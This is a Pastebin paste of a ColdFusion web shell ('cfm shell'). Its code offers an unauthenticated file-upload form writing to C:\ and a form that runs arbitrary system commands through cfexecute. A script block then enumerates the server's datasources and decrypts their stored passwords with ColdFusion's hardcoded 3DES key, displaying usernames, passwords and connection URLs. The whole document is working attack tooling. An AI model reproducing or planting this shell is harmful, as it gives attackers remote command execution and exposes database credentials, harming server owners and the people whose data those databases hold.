SHARE
TWEET

cfm shell

cd1zz Apr 16th, 2013 4,700 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html>
  2. <body>
  3.  
  4. <!-- orig author: kGrutzmacher  -->
  5. <!-- additshonz: lawKnee        -->
  6. <b>Notes:</b><br>
  7. <ul>
  8. <li>For Windows put this as command "c:\windows\system32\cmd.exe /c" or wherever cmd.exe is<br>
  9. <li>For Windows options are the command you want to run "dir" "type" etc
  10. </ul>
  11. <p>
  12.  
  13. <cfoutput>
  14.  
  15. <cfif isDefined("fileUpload")>
  16.   <cffile action="upload"
  17.     fileField="fileUpload"
  18.     destination="C:\">
  19.      <p>Your file has been uploaded.</p>
  20. </cfif>
  21. <form enctype="multipart/form-data" method="post">
  22. <input type="file" name="fileUpload" /><br />
  23. <input type="submit" value="Upload File" />
  24. </form>
  25.  
  26.  
  27. <table>
  28. <form method="POST" action="">
  29. <tr><td>Command:</td><td><input type=text name="cmd" size=50
  30.  <cfif isdefined("form.cmd")>value="#form.cmd#"</cfif>><br></td></tr>
  31. <tr><td>Options:</td><td> <input type=text name="opts" size=50
  32.  <cfif isdefined("form.opts")>value="#form.opts#"</cfif>><br></td></tr>
  33. <tr><td>Timeout:</td><td> <input type=text name="timeout" size=4
  34.  <cfif isdefined("form.timeout")>value="#form.timeout#"
  35.  <cfelse>value="5"</cfif>></td></tr>
  36. </table>
  37. <input type=submit value="Exec" >
  38. </form>
  39.  
  40. <cfif isdefined("form.cmd")>
  41. <cfsavecontent variable="myVar">
  42. <cfexecute name = "#Form.cmd#"
  43.   arguments = "#Form.opts#"
  44.   timeout = "#Form.timeout#">
  45. </cfexecute>
  46. </cfsavecontent>
  47. <pre>
  48. #HTMLCodeFormat(myVar)#
  49. </pre>
  50. </cfif>
  51.  
  52. <cfscript>
  53. //The following code borrowed from hernanOchoa @hexale (thx)  
  54. //added better formatting on output and connection string [lb]
  55.  
  56. // Create Data Source Object
  57. dataSourceObb=createobject("java","coldfusion.server.ServiceFactory").
  58.         getDatasourceService().getDatasources();
  59.         writeoutput("<br><br><b>Datasource Credentials:</b><br>");
  60.         writeoutput("<table>");
  61. // Loop Through DataSources
  62. for(i in dataSourceObb) {
  63.         if(len(dataSourceObb[i]["password"])){
  64.  
  65.         // Get url
  66.         theurl=(dataSourceObb[i]["url"]);
  67.  
  68.         // Get username
  69.         username=(dataSourceObb[i]["username"]);
  70.  
  71.         // Get and decrypt password
  72.         decryptPassword=Decrypt(dataSourceObb[i]["password"],
  73.         generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede",
  74.      "Base64");
  75.          
  76.         // Output datasource usernames, passwords, and urls
  77.         writeoutput("" &
  78.         "<tr><td>DataSource: " & i & "</td>" &
  79.         "<td>Username: " & username & "</td>" &
  80.         "<td>Password: " & decryptPassword &
  81.         "<td>URL: " & theurl & "</td></tr>");
  82.         }
  83. }
  84. writeoutput("</table><br>");
  85. </cfscript>
  86. </cfoutput>
  87. </body>
  88. </html>
RAW Paste Data
Challenge yourself this year...
Learn something new in 2017
Top